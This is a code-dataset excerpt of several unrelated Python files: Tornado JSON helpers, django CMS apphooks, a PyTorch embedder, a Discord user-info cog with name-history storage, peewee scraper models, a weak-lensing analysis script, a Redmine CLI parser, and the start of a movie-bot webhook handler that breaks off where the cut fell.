id
stringlengths 1
7
| text
stringlengths 6
1.03M
| dataset_id
stringclasses 1
value |
---|---|---|
1656384
|
<reponame>elixir-no-nels/nels-core
from tornado import gen
def coroutine_return():
    """Exit the calling Tornado coroutine by raising ``gen.Return()`` (no value)."""
    raise gen.Return()
def return_with_status(hndlr, status_code, response_key=None, response_val=None):
    """Finish a JSON response on *hndlr* with the given HTTP status.

    Writes ``{response_key: response_val}`` as the body only when both are
    provided, then raises ``gen.Return()`` to leave the calling coroutine.
    """
    hndlr.set_header('Content-Type', 'application/json')
    hndlr.set_status(status_code)
    # NOTE(review): truthiness check means falsy payloads (0, '', [], {}) are
    # silently dropped from the body — confirm that is intended.
    if response_key and response_val:
        hndlr.write({response_key:response_val})
    coroutine_return()
def return_201(hndlr, new_id):
    """Finish with HTTP 201 (Created), echoing the new resource id."""
    return_with_status(hndlr, 201, response_key='id', response_val=new_id)
def return_400(hndlr, msgs):
    """Finish with HTTP 400 (Bad Request), attaching validation messages."""
    return_with_status(hndlr, 400, response_key="msgs", response_val=msgs)
def return_404(hndlr):
    """Finish with HTTP 404 (Not Found); no body is written."""
    return_with_status(hndlr, status_code=404)
def return_500(hndlr):
    """Finish with HTTP 500 (Internal Server Error); no body is written."""
    return_with_status(hndlr, status_code=500)
def return_501(hndlr):
    """Finish with HTTP 501 (Not Implemented); no body is written.

    Bug fix: this helper previously sent status 500, contradicting its name
    and making "not implemented" endpoints indistinguishable from server
    errors for API clients.
    """
    return_with_status(hndlr, 501)
def return_data(hndlr, data):
    """Finish with HTTP 200 (OK), wrapping the payload under the "data" key."""
    return_with_status(hndlr, 200, response_key="data", response_val=data)
|
StarcoderdataPython
|
1766864
|
from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
@apphook_pool.register
class BackCallHook(CMSApp):
    """django CMS apphook attaching the "Back call" app to rollercms URLs."""

    app_name = "roller_site"
    name = "Back call"
    # NOTE(review): `_urls` duplicates get_urls() below; confirm which one the
    # installed CMS version actually consults — one of the two may be dead.
    _urls = ["rollercms.urls"]

    def get_urls(self, page=None, language=None, **kwargs):
        # Same URLconf regardless of page or language.
        return ["rollercms.urls"]
@apphook_pool.register
class BlogHook(CMSApp):
    """django CMS apphook for the blog post list (name is Russian: "Post list")."""

    app_name = "roller_site"
    name = 'Список постов'

    def get_urls(self, page=None, language=None, **kwargs):
        # Same URLconf regardless of page or language.
        return ["rollercms.urls"]
|
StarcoderdataPython
|
3292355
|
import torch
from torch import nn
from torch.nn.utils import spectral_norm
from generators.common import blocks
class Wrapper:
    """CLI glue for the Embedder: declares its options and builds the net."""

    @staticmethod
    def get_args(parser):
        # Embedder-specific options; `parser` is the project's extended
        # argument parser exposing `add` (not stdlib argparse's add_argument).
        parser.add('--embed_padding', type=str, default='zero', help='zero|reflection')
        parser.add('--embed_num_blocks', type=int, default=6)
        parser.add('--average_function', type=str, default='sum', help='sum|max')

    @staticmethod
    def get_net(args):
        """Construct an Embedder from parsed args and move it to args.device."""
        net = Embedder(
            args.embed_padding, args.in_channels, args.out_channels,
            args.num_channels, args.max_num_channels, args.embed_channels,
            args.embed_num_blocks, args.average_function)
        return net.to(args.device)
class Embedder(nn.Module):
    """Convolutional identity encoder mapping reference RGB frames to embeddings.

    A strided residual trunk downsamples each frame to a vector of size
    ``embed_channels``; per-frame embeddings are then pooled over the frame
    axis according to ``average_function`` ('sum' -> mean, 'max' -> max).
    """

    def __init__(self, padding, in_channels, out_channels, num_channels, max_num_channels, embed_channels,
                 embed_num_blocks, average_function):
        super().__init__()

        def get_down_block(in_channels, out_channels, padding):
            # Downsampling residual block without normalization.
            return blocks.ResBlock(in_channels, out_channels, padding, upsample=False, downsample=True,
                                   norm_layer='none')

        # Resolve the padding mode name to a layer class.
        # NOTE(review): any other value leaves `padding` as a string, and the
        # `padding(1)` call below will fail — consider raising ValueError here.
        if padding == 'zero':
            padding = nn.ZeroPad2d
        elif padding == 'reflection':
            padding = nn.ReflectionPad2d

        # NOTE(review): the `in_channels` argument is deliberately overridden —
        # inputs are always treated as 3-channel RGB.
        in_channels = 3
        self.out_channels = embed_channels

        # Stem: two padded 3x3 convs (spectrally normalized) + 2x downsample.
        self.down_block = nn.Sequential(
            padding(1),
            spectral_norm(
                nn.Conv2d(3, num_channels, 3, 1, 0),
                eps=1e-4),
            nn.ReLU(),
            padding(1),
            spectral_norm(
                nn.Conv2d(num_channels, num_channels, 3, 1, 0),
                eps=1e-4),
            nn.AvgPool2d(2))
        # Residual shortcut for the stem (1x1 conv + matching downsample).
        self.skip = nn.Sequential(
            spectral_norm(
                nn.Conv2d(3, num_channels, 1),
                eps=1e-4),
            nn.AvgPool2d(2))

        # Trunk: channel count doubles each block, capped at max_num_channels;
        # the final block projects to embed_channels.
        layers = []
        in_channels = num_channels
        for i in range(1, embed_num_blocks - 1):
            out_channels = min(in_channels * 2, max_num_channels)
            layers.append(get_down_block(in_channels, out_channels, padding))
            in_channels = out_channels
        layers.append(get_down_block(out_channels, embed_channels, padding))
        self.down_blocks = nn.Sequential(*layers)

        self.average_function = average_function
        # When True, forward() skips re-computing the identity embedding.
        self.finetuning = False

    def enable_finetuning(self, data_dict=None):
        """Freeze identity-embedding computation for fine-tuning passes."""
        self.finetuning = True

    def get_identity_embedding(self, data_dict):
        """Compute pooled identity embeddings and store them in data_dict."""
        # Assumes enc_rgbs is (batch, n_frames, C, H, W) — frames are folded
        # into the batch axis for the conv trunk. TODO confirm against caller.
        enc_rgbs = data_dict['enc_rgbs']
        inputs = enc_rgbs
        b, n, c, h, w = inputs.shape
        inputs = inputs.view(-1, c, h, w)
        out = self.down_block(inputs)
        out = out + self.skip(inputs)
        out = self.down_blocks(out)
        out = torch.relu(out)
        # Sum over spatial positions -> one vector per frame.
        embeds_elemwise = out.view(b, n, self.out_channels, -1).sum(3)
        if self.average_function == 'sum':
            embeds = embeds_elemwise.mean(1)
        elif self.average_function == 'max':
            embeds = embeds_elemwise.max(1)[0]
        else:
            raise Exception('Incorrect `average_function` argument, expected `sum` or `max`')
        data_dict['embeds'] = embeds
        data_dict['embeds_elemwise'] = embeds_elemwise

    def get_pose_embedding(self, data_dict):
        # Intentionally a no-op: this embedder produces no pose embedding.
        pass

    def forward(self, data_dict):
        if not self.finetuning:
            self.get_identity_embedding(data_dict)
        self.get_pose_embedding(data_dict)
|
StarcoderdataPython
|
1637090
|
from typing import Optional
from discord.ext import commands
from .utils import checks
from .utils.dataIO import DataIO
from discord import Member, Embed, Role, utils
import discord
from datetime import datetime,timedelta
import time
import re
from typing import Union
import json
class Userinfo(commands.Cog):
    """show infos about the current or other users"""

    def __init__(self, bot):
        self.bot = bot
        # Ensure the name/nickname history tables exist before any lookups.
        self.bot.loop.create_task(self.create_name_tables())

    @commands.command(pass_context=True)
    async def userinfo(self, ctx, member: Member = None):
        """shows the info about yourself or another user"""
        if member is None:
            member = ctx.message.author
        join_date = member.joined_at
        created_at = member.created_at
        user_color = member.color
        user_roles = member.roles.copy()
        server = ctx.message.guild
        # Prefer the server nickname, fall back to the account name.
        if member.nick:
            nick = member.nick
        else:
            nick = member.name
        time_fmt = "%d %b %Y %H:%M"
        joined_number_of_days_diff = (datetime.utcnow() - join_date).days
        created_number_of_days_diff = (datetime.utcnow() - created_at).days
        # 1-based rank of this member when all members are sorted by join date.
        member_number = sorted(server.members, key=lambda m: m.joined_at).index(member) + 1
        embed = Embed(description="[{0.name}#{0.discriminator} - {1}]({2})".format(member, nick, member.avatar_url), color=user_color)
        if member.avatar_url:
            embed.set_thumbnail(url=member.avatar_url)
        else:
            embed.set_thumbnail(url=member.default_avatar_url)
        embed.add_field(name="Joined Discord on",
                        value="{}\n({} days ago)".format(member.created_at.strftime(time_fmt),
                                                         created_number_of_days_diff),
                        inline=True)
        embed.add_field(name="Joined Server on",
                        value="{}\n({} days ago)".format(member.joined_at.strftime(time_fmt),
                                                         joined_number_of_days_diff),
                        inline=True)
        # Drop the implicit @everyone role (always first) before listing.
        user_roles.pop(0)
        if user_roles:
            embed.add_field(name="Roles", value=", ".join([x.mention for x in user_roles]), inline=True)
        embed.set_footer(text="Member #{} | User ID: {}".format(member_number, member.id))
        await ctx.send(embed=embed)

    @commands.command(aliases=["avi", "profile_pic"])
    async def pfp(self, ctx, member: Union[discord.Member, str] = None):
        """
        makes the bot post the pfp of a member
        """
        if isinstance(member, discord.Member):
            await ctx.send(member.avatar_url_as(static_format="png"))
        elif isinstance(member, str):
            # Accept a raw user ID or a <@...>/<@!...> mention string.
            pattern = re.compile(r'(<@!?)?(\d{17,})>?')
            match = pattern.match(member)
            if match and match.group(2):
                user = await self.bot.fetch_user(int(match.group(2)))
                if user:
                    await ctx.send(user.avatar_url_as(static_format="png"))
            else:
                await ctx.send("Not a valid user ID or mention")
        else:
            # No argument: post the invoker's own avatar.
            await ctx.send(ctx.author.avatar_url_as(static_format="png"))

    @commands.command(pass_context=True)
    async def serverinfo(self, ctx):
        """shows info about the current server"""
        server = ctx.message.guild
        time_fmt = "%d %b %Y %H:%M"
        # Guild age in whole days.
        creation_time_diff = int(time.time() - time.mktime(server.created_at.timetuple())) // (3600 * 24)
        users_total = len(server.members)
        # "Online" here counts both online and idle members.
        users_online = len([m for m in server.members if m.status == discord.Status.online or
                            m.status == discord.Status.idle])
        colour = server.me.colour
        if server.icon:
            embed = Embed(description="[{}]({})\nCreated {} ({} days ago)"
                          .format(server.name, server.icon_url, server.created_at.strftime(time_fmt), creation_time_diff),
                          color=colour)
            embed.set_thumbnail(url=server.icon_url)
        else:
            embed = Embed(description="{}\nCreated {} ({} days ago)"
                          .format(server.name, server.created_at.strftime(time_fmt), creation_time_diff))
        embed.add_field(name="Region", value=str(server.region))
        embed.add_field(name="Users", value="{}/{}".format(users_online, users_total))
        embed.add_field(name="Text Channels", value="{}"
                        .format(len([x for x in server.channels if type(x) == discord.TextChannel])))
        embed.add_field(name="Voice Channels", value="{}"
                        .format(len([x for x in server.channels if type(x) == discord.VoiceChannel])))
        embed.add_field(name="Roles", value="{}".format(len(server.roles)))
        embed.add_field(name="Owner", value=str(server.owner))
        embed.set_footer(text="Server ID: {}".format(server.id))
        await ctx.send(embed=embed)

    @commands.command()
    async def roleinfo(self, ctx, role=None):
        """shows information about the server roles"""
        role_converter = commands.RoleConverter()
        server = ctx.message.guild
        roles = server.roles
        embed = Embed()
        embed.set_thumbnail(url=server.icon_url)
        if not role:
            # No argument: list member counts for every role except @everyone.
            for role in roles:
                if role.name == "@everyone":
                    continue
                member_with_role = [member for member in server.members if role in member.roles]
                embed.add_field(name=role.name, value="{} Member(s)".format(len(member_with_role)))
        else:
            # Resolve the given name/mention/ID to a single role.
            role = await role_converter.convert(ctx=ctx, argument=role)
            member_with_role = [member for member in server.members if role in member.roles]
            embed.add_field(name=role.name, value="{} Member(s)".format(len(member_with_role)))
        await ctx.send(embed=embed)

    async def fetch_names(self, member):
        """Return up to 20 most recent distinct past names for *member*."""
        async with self.bot.db.acquire() as con:
            # DISTINCT ON collapses repeated names to one row each.
            stmt = await con.prepare('''
                SELECT *
                FROM (
                    SELECT DISTINCT ON (name) *
                    from names
                    where user_id = $1
                ) p
                ORDER BY change_date DESC
                LIMIT 20
            ''')
            return await stmt.fetch(member.id)

    async def fetch_nicknames(self, member):
        """Return up to 20 most recent distinct past nicknames for *member*."""
        async with self.bot.db.acquire() as con:
            stmt = await con.prepare('''
                SELECT *
                FROM (
                    SELECT DISTINCT ON (nickname) *
                    from nicknames
                    where user_id = $1
                ) p
                ORDER BY change_date DESC
                LIMIT 20
            ''')
            return await stmt.fetch(member.id)

    async def create_name_tables(self):
        """Create the name/nickname history tables if they do not exist."""
        query = '''
            CREATE TABLE IF NOT EXISTS names(
                user_id BIGINT,
                name varchar(32),
                change_date timestamp
            );
            CREATE TABLE IF NOT EXISTS nicknames(
                user_id BIGINT,
                nickname varchar(32),
                change_date timestamp
            );
        '''
        async with self.bot.db.acquire() as con:
            async with con.transaction():
                await con.execute(query)

    @commands.is_owner()
    @commands.command()
    async def lnames(self, ctx):
        # One-off migration: import legacy JSON name history into the DB.
        data_io = DataIO()
        entries = data_io.load_json('names')
        for entry in entries:
            names = entries[entry].get("names", [])
            nicknames = entries[entry].get("nicknames", [])
            async with self.bot.db.acquire() as con:
                for name in names:
                    stmt = await con.prepare('''
                        INSERT INTO names VALUES ($1,$2,current_timestamp)
                        RETURNING *
                    ''')
                    async with con.transaction():
                        await stmt.fetch(int(entry), name)
                for nickname in nicknames:
                    stmt = await con.prepare('''
                        INSERT INTO nicknames VALUES ($1,$2,current_timestamp)
                        RETURNING *
                    ''')
                    async with con.transaction():
                        await stmt.fetch(int(entry), nickname)

    @commands.command()
    async def names(self, ctx, member: Member = None):
        """
        lists the past 20 names and nicknames of a user
        """
        if not member:
            member = ctx.message.author
        data_names = await self.fetch_names(member)
        data_nicknames = await self.fetch_nicknames(member)
        nickname_list = []
        names_list = []
        for entry in data_names:
            names_list.append(entry['name'])
        for entry in data_nicknames:
            nickname_list.append(entry['nickname'])
        # Ensure the current name/nick leads the list even if not in the DB yet.
        if member.name not in names_list:
            names_list.insert(0, member.name)
        if member.nick not in nickname_list and member.nick:
            nickname_list.insert(0, member.nick)
        message_fmt = "**Past 20 names:**\n{}\n" \
                      "**Past 20 nicknames:**\n{}"
        # Escape markdown so names cannot alter message formatting.
        names_list_str = discord.utils.escape_markdown(", ".join(names_list))
        display_names_list_str = discord.utils.escape_markdown(", ".join(nickname_list))
        await ctx.send(message_fmt.format(names_list_str, display_names_list_str))

    @commands.Cog.listener("on_member_update")
    async def save_nickname_change(self, before, after):
        # Skip recording nicknames containing slurs/forbidden words.
        forbidden_word_regex = re.compile(r'(trap|nigg(a|er)|fag(got)?)')
        if forbidden_word_regex.search(before.display_name) or forbidden_word_regex.search(after.display_name):
            return
        if before.nick != after.nick and after.nick:
            async with self.bot.db.acquire() as con:
                stmt = await con.prepare('''
                    INSERT INTO nicknames VALUES ($1,$2,current_timestamp)
                    RETURNING *
                ''')
                async with con.transaction():
                    new_row = await stmt.fetch(after.id, after.nick)

    @commands.Cog.listener("on_user_update")
    async def save_username_change(self, before, after):
        # Skip recording usernames containing slurs/forbidden words.
        forbidden_word_regex = re.compile(r'(trap|nigg(a|er)|fag(got)?)')
        if forbidden_word_regex.search(before.name) or forbidden_word_regex.search(after.name):
            return
        if before.name != after.name:
            async with self.bot.db.acquire() as con:
                stmt = await con.prepare('''
                    INSERT INTO names VALUES ($1,$2,current_timestamp)
                    RETURNING *
                ''')
                async with con.transaction():
                    new_row = await stmt.fetch(after.id, after.name)
def setup(bot):
    """Standard discord.py extension entry point: register the Userinfo cog."""
    bot.add_cog(Userinfo(bot=bot))
|
StarcoderdataPython
|
4814974
|
<reponame>zhu4ce4/lianjia
# -*- coding: utf-8 -*-
from peewee import *
import datetime
import settings
# Pick the peewee database backend from settings.DBENGINE
# (supported values: mysql | sqlite3 | postgresql).
_engine = settings.DBENGINE.lower()
if _engine == 'mysql':
    database = MySQLDatabase(
        settings.DBNAME,
        host=settings.DBHOST,
        port=settings.DBPORT,
        user=settings.DBUSER,
        passwd=settings.DBPASSWORD,
        charset='utf8',
        use_unicode=True,
    )
elif _engine == 'sqlite3':
    database = SqliteDatabase(settings.DBNAME)
elif _engine == 'postgresql':
    database = PostgresqlDatabase(
        settings.DBNAME,
        user=settings.DBUSER,
        password=settings.DBPASSWORD,
        host=settings.DBHOST,
        charset='utf8',
        use_unicode=True,
    )
else:
    # Typo fix: the message previously read "datatbase".
    raise AttributeError("Please setup database at settings.py")
class BaseModel(Model):
    """Base for all models; binds every subclass to the configured database."""

    class Meta:
        database = database
class Community(BaseModel):
    """A residential community (小区) record scraped from Lianjia."""

    id = BigIntegerField(primary_key=True)
    title = CharField()
    link = CharField(unique=True)
    district = CharField()
    busicircle = CharField()  # business circle / sub-district
    tagList = CharField()
    onsale = CharField()      # number of listings currently for sale
    onrent = CharField(null=True)
    builtyear = CharField(null=True)
    builttype = CharField(null=True)
    wuyecost = CharField(null=True)   # wuye = pinyin for 物业 (property management) fee
    servcomp = CharField(null=True)
    builtcomp = CharField(null=True)
    buildingnum = CharField(null=True)
    housenum = CharField(null=True)
    price = CharField(null=True)
    followers = IntegerField(null=True)
    dealin90 = IntegerField(null=True)  # deals closed in the last 90 days
    validdate = DateTimeField(default=datetime.datetime.now)
class Houseinfo(BaseModel):
    """An individual for-sale house listing."""

    houseID = CharField(primary_key=True)
    title = CharField()
    link = CharField()
    community = CharField()
    years = CharField()
    housetype = CharField()
    square = CharField()
    direction = CharField()
    floor = CharField()
    taxtype = CharField()
    totalPrice = CharField()
    unitPrice = CharField()
    followInfo = CharField()
    decoration = CharField()
    validdate = DateTimeField(default=datetime.datetime.now)
class Hisprice(BaseModel):
    """Price history: one row per observed (house, total price) pair."""

    houseID = CharField()
    totalPrice = CharField()
    date = DateTimeField(default=datetime.datetime.now)

    class Meta:
        # Composite key: re-seeing the same house at the same price dedupes.
        primary_key = CompositeKey('houseID', 'totalPrice')
class Sellinfo(BaseModel):
    """A sale/deal record for a house listing."""

    houseID = CharField(primary_key=True)
    title = CharField()
    link = CharField()
    community = CharField()
    years = CharField()
    housetype = CharField()
    square = CharField()
    direction = CharField()
    floor = CharField()
    status = CharField()
    source = CharField()
    totalPrice = CharField()
    unitPrice = CharField()
    dealdate = CharField(null=True)  # null while the deal is still pending
    validdate = DateTimeField(default=datetime.datetime.now)
class Rentinfo(BaseModel):
    """A rental listing."""

    # The rental pages expose no house id, so no natural primary key is used:
    # houseID = CharField(primary_key=True)
    title = CharField()
    link = CharField()
    region = CharField()
    zone = CharField()
    meters = CharField()
    shitingwei = CharField()  # pinyin for 室厅卫: rooms/living rooms/bathrooms
    price = CharField()
    updatedate = DateTimeField(default=datetime.datetime.now)
def database_init():
    """Connect, create the Community table if missing, and disconnect."""
    database.connect()
    database.create_tables(
        # Other models are currently excluded from auto-creation:
        # [Community, Houseinfo, Hisprice, Sellinfo, Rentinfo], safe=True)
        [Community], safe=True)
    database.close()
|
StarcoderdataPython
|
1797103
|
#!/usr/bin/env python
"""
Compute the DSigma profiles for different lenses
"""
import os
import pickle
from astropy.table import Table
from jianbing import scatter
from jianbing import wlensing
TOPN_DIR = '/tigress/sh19/work/topn/'

# Lensing data using medium photo-z quality cut
s16a_lensing = os.path.join(TOPN_DIR, 'prepare', 's16a_weak_lensing_medium.hdf5')

# Random points matched to the lensing catalog
s16a_rand = Table.read(s16a_lensing, path='random')

# Pre-compute results using medium photo-z quality cut
s16a_precompute_med = os.path.join(
    TOPN_DIR, 'precompute', 'topn_public_s16a_medium_precompute.hdf5')

# Pre-compute results for each individual samples
# HSC massive galaxies
hsc = Table.read(s16a_precompute_med, path='hsc_extra')

# TopN bins
topn_bins = Table.read(
    os.path.join(TOPN_DIR, 'precompute', 'topn_bins.fits'))

# Tabulated simulation results
sim_cat = Table.read(
    os.path.join(TOPN_DIR, 'precompute', 'sim_merge_all_dsig.fits'))

# HSC properties to use
# Stellar or halo mass measurements for HSC galaxies
hsc_mass = [
    'logm_cmod', 'logm_5', 'logm_10', 'logm_15', 'logm_25',
    'logm_30', 'logm_40', 'logm_50', 'logm_60',
    'logm_75', 'logm_100', 'logm_120', 'logm_150', 'logm_max',
    'logmh_vir_forest', 'logmh_vir_plane', 'logmh_vir_symbol',
    'logm_extra_120', 'logm_extra_150', 'logm_extra_200', 'logm_extra_300',
    'logm_r50', 'logm_r50_half', 'logm_2_r50', 'logm_3_r50',
    'logm_4_r50', 'logm_5_r50', 'logm_6_r50',
    'logm_10_100', 'logm_30_100', 'logm_40_100', 'logm_50_100', 'logm_60_100',
    'logm_50_150', 'logm_60_150', 'logm_75_150', 'logm_40_120', 'logm_50_120',
    'logm_60_120', 'logm_75_120',
    'logm_50_120_extra', 'logm_50_150_extra', 'logm_50_200_extra', 'logm_50_300_extra',
    'logm_2_4_r50', 'logm_2_6_r50', 'logm_3_4_r50', 'logm_3_5_r50',
    'logm_3_6_r50', 'logm_4_6_r50'
]

# Size measurements for HSC galaxies
hsc_size = ['r50_100', 'r80_100', 'r90_100', 'r50_120', 'r80_120', 'r90_120',
            'r50_max', 'r80_max', 'r90_max', 'logr_vir_forest']

# S18A bright star mask
bsm_s18a = hsc['flag'] > 0

# General mask for HSC galaxies
mask = (
    (hsc['c82_100'] <= 18.) & (hsc['logm_100'] - hsc['logm_50'] <= 0.2) &
    bsm_s18a
)

# General mask for HSC size measurements
size_mask = (
    mask & (hsc['logm_max'] >= 11.3) & (hsc['r80_100'] <= 60.0) & (hsc['r90_100'] <= 60.0)
)

# Mask to select "central" galaxies
cen_mask_1 = hsc['cen_mask_1'] > 0
cen_mask_2 = hsc['cen_mask_2'] > 0
cen_mask_3 = hsc['cen_mask_3'] > 0

n_rand = 200000
n_boot = 1000
n_jobs = 8

topn_galaxies = {}
topn_galaxies_sum = {}

# Stellar mass related
for col in hsc_mass:
    # Default test with both jackknife and full (n_boot) bootstrap error
    topn_galaxies[col] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=mask, n_rand=n_rand,
        n_boot=n_boot, verbose=True, n_jobs=n_jobs)
    topn_galaxies_sum[col] = scatter.compare_model_dsigma(
        topn_galaxies[col], sim_cat, model_err=False, poly=True, verbose=True)

    # The whole sample, without applying any mask; reduced bootstrap (200)
    topn_galaxies[col + '_all'] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=None, n_rand=n_rand,
        verbose=False, n_jobs=n_jobs, n_boot=200)
    topn_galaxies_sum[col + '_all'] = scatter.compare_model_dsigma(
        topn_galaxies[col + '_all'], sim_cat, model_err=False, poly=True, verbose=False)

    # Applying central mask 1; reduced bootstrap (200)
    topn_galaxies[col + '_cen1'] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=(mask & cen_mask_1), n_rand=n_rand,
        verbose=False, n_jobs=n_jobs, n_boot=200)
    topn_galaxies_sum[col + '_cen1'] = scatter.compare_model_dsigma(
        topn_galaxies[col + '_cen1'], sim_cat, model_err=False, poly=True, verbose=False)

    # Applying central mask 2; reduced bootstrap (200)
    topn_galaxies[col + '_cen2'] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=(mask & cen_mask_2), n_rand=n_rand,
        verbose=False, n_jobs=n_jobs, n_boot=200)
    topn_galaxies_sum[col + '_cen2'] = scatter.compare_model_dsigma(
        topn_galaxies[col + '_cen2'], sim_cat, model_err=False, poly=True, verbose=False)

    # Applying central mask 3; reduced bootstrap (200)
    topn_galaxies[col + '_cen3'] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=(mask & cen_mask_3), n_rand=n_rand,
        verbose=False, n_jobs=n_jobs, n_boot=200)
    topn_galaxies_sum[col + '_cen3'] = scatter.compare_model_dsigma(
        topn_galaxies[col + '_cen3'], sim_cat, model_err=False, poly=True, verbose=False)

# Galaxy size related
for col in hsc_size:
    # Default test with both jackknife and full (n_boot) bootstrap error
    topn_galaxies[col] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=(mask & size_mask), n_rand=n_rand,
        n_boot=n_boot, verbose=True, n_jobs=n_jobs)
    topn_galaxies_sum[col] = scatter.compare_model_dsigma(
        topn_galaxies[col], sim_cat, model_err=False, poly=True, verbose=False)

    # The whole sample, without applying any mask; reduced bootstrap (200)
    topn_galaxies[col + '_all'] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=None, n_rand=n_rand,
        verbose=False, n_jobs=n_jobs, n_boot=200)
    topn_galaxies_sum[col + '_all'] = scatter.compare_model_dsigma(
        topn_galaxies[col + '_all'], sim_cat, model_err=False, poly=True, verbose=False)

    # Applying central mask 1; full bootstrap (n_boot)
    topn_galaxies[col + '_cen1'] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=(mask & size_mask & cen_mask_1), n_rand=n_rand,
        n_boot=n_boot, verbose=False, n_jobs=n_jobs)
    topn_galaxies_sum[col + '_cen1'] = scatter.compare_model_dsigma(
        topn_galaxies[col + '_cen1'], sim_cat, model_err=False, poly=True, verbose=False)

    # Applying central mask 2; full bootstrap (n_boot)
    # NOTE(review): unlike the other calls, n_jobs is not passed here —
    # confirm whether this (and cen3 below) should also use n_jobs=n_jobs.
    topn_galaxies[col + '_cen2'] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=(mask & size_mask & cen_mask_2), n_rand=n_rand,
        n_boot=n_boot, verbose=False)
    topn_galaxies_sum[col + '_cen2'] = scatter.compare_model_dsigma(
        topn_galaxies[col + '_cen2'], sim_cat, model_err=False, poly=True, verbose=False)

    # Applying central mask 3; full bootstrap (n_boot)
    topn_galaxies[col + '_cen3'] = wlensing.gather_topn_dsigma_profiles(
        hsc, s16a_rand, topn_bins, col, mask=(mask & size_mask & cen_mask_3), n_rand=n_rand,
        n_boot=n_boot, verbose=False)
    topn_galaxies_sum[col + '_cen3'] = scatter.compare_model_dsigma(
        topn_galaxies[col + '_cen3'], sim_cat, model_err=False, poly=True, verbose=False)

# Persist both result dictionaries for later analysis.
pickle.dump(
    topn_galaxies, open(os.path.join(TOPN_DIR, 'topn_galaxies.pkl'), "wb"))
pickle.dump(
    topn_galaxies_sum, open(os.path.join(TOPN_DIR, 'topn_galaxies_sum.pkl'), "wb"))
|
StarcoderdataPython
|
1732672
|
import argparse
import sys
import helpers
def preprocess_argv():
    """Normalize raw CLI arguments before argparse sees them.

    Expands one-letter command abbreviations, rewrites "+<issue>" to
    "new <issue>", treats a lone time period as "list <period>", and falls
    back to the "list" command otherwise. Returns the rewritten argv
    (without the script name); empty input is returned unchanged.
    """
    argv = sys.argv[1:]
    if not argv:
        return argv
    abbreviations = {
        'l': 'list',
        'u': 'update',
        'n': 'new',
        'd': 'delete',
        'p': 'periods'
    }
    first = argv[0]
    if first in abbreviations:
        # Expand one-letter command abbreviation.
        argv = [abbreviations[first]] + argv[1:]
    elif first.startswith('+'):
        # "+<issue>" is shorthand for "new <issue>".
        argv = ['new', first[1:]] + argv[1:]
    elif len(argv) == 1 and helpers.resolve_period_abbreviation(first):
        # A lone time period becomes the basis for a list command.
        argv = ['list', first]
    else:
        # NOTE(review): full command names ("new", "list", ...) also land
        # here and are replaced by a bare "list" — confirm that is intended.
        argv = ['list']
    return argv
def arg_parser():
    """Build and return the ArgumentParser for this application.

    Commands: new, update, list, delete, periods, flush. Each sub-command
    stores the name of its handler function in the ``func`` attribute.
    """
    parser = argparse.ArgumentParser(description='Redmine client.')
    commands = parser.add_subparsers(dest='command')

    # Options shared by the "new" and "update" commands.
    shared = argparse.ArgumentParser(add_help=False)
    shared.add_argument('-c', '--comments', metavar='comments', action='store')
    shared.add_argument('-t', '--hours', metavar='hours spent', action='store')
    shared.add_argument('-a', '--activity', metavar='activity', action='store')
    shared.add_argument('-d', '--date', metavar='date', action='store', help='defaults to today')

    # New entry command
    new_cmd = commands.add_parser('new', help='Create new time entry', parents=[shared])
    new_cmd.add_argument('id', nargs='?', metavar='issue ID', help='ID of issue')
    new_cmd.set_defaults(func='new_entry')

    # Update entry command
    update_cmd = commands.add_parser('update', help='Update time entry', parents=[shared])
    update_cmd.add_argument('id', nargs='?', metavar='time entry ID', help='ID of time entry')
    update_cmd.set_defaults(func='update_entry')

    # List command
    list_cmd = commands.add_parser('list', help='List time entries')
    list_cmd.add_argument('period', nargs='?', metavar='period', help='time period')
    list_cmd.add_argument('-s', '--start', metavar='start date', action='store')
    list_cmd.add_argument('-e', '--end', metavar='end date', action='store')
    list_cmd.set_defaults(func='list_entries')

    # Delete command
    delete_cmd = commands.add_parser('delete', help='Delete time entry')
    delete_cmd.add_argument('id', nargs='?', metavar='time entry ID', help='ID of time entry')
    delete_cmd.set_defaults(func='delete_entry')

    # Periods command
    periods_cmd = commands.add_parser('periods', help='List periods')
    periods_cmd.set_defaults(func='list_periods')

    # Flush command
    flush_cmd = commands.add_parser('flush', help='Flush cache')
    flush_cmd.set_defaults(func='flush')

    return parser
def validate_args(parser, args, config, activities):
    """Normalize aliases/abbreviations in parsed *args* and validate them.

    Exits via parser.error() on an invalid period, ID, or activity; otherwise
    returns the (possibly modified) args namespace.
    """
    # Normalize and validate period
    if 'period' in args and args.period:
        args.period = helpers.resolve_period_abbreviation(args.period)
        if not args.period:
            parser.error('Invalid period.')
    # Normalize and validate issue/entry ID
    if 'id' in args and args.id:
        if args.command == 'new':
            # Issue templates in config may pre-fill entry fields; explicit
            # command-line options take precedence over template defaults.
            default_comments = helpers.template_field(args.id, 'comments', config['issues'])
            default_hours = helpers.template_field(args.id, 'hours', config['issues'])
            default_activity = helpers.template_field(args.id, 'activity', config['issues'])
            if default_comments and not args.comments:
                args.comments = default_comments
            if default_hours and not args.hours:
                args.hours = default_hours
            if default_activity and not args.activity:
                args.activity = default_activity
        args.id = helpers.resolve_issue_alias(args.id, config['issues'])
        if not str(args.id).isdigit():
            parser.error('Invalid ID.')
    # Normalize and validate activity against the known activity names.
    if 'activity' in args and args.activity:
        args.activity = helpers.resolve_activity_alias(args.activity, config['activities'])
        if args.activity not in activities:
            parser.error('Invalid activity.')
    return args
|
StarcoderdataPython
|
20197
|
<reponame>rodrigocamposdf/MovieBot<gh_stars>1-10
import movies
def action_handler(action, parameters, return_var):
    """Dispatch a webhook *action* and wrap its result for Watson Assistant.

    Unknown actions yield an empty user_defined payload.
    """
    if action == 'trendings':
        payload = get_trendings(parameters, return_var)
    elif action == 'search':
        payload = search_movies(parameters, return_var)
    else:
        payload = {}
    # Watson Assistant webhook response envelope.
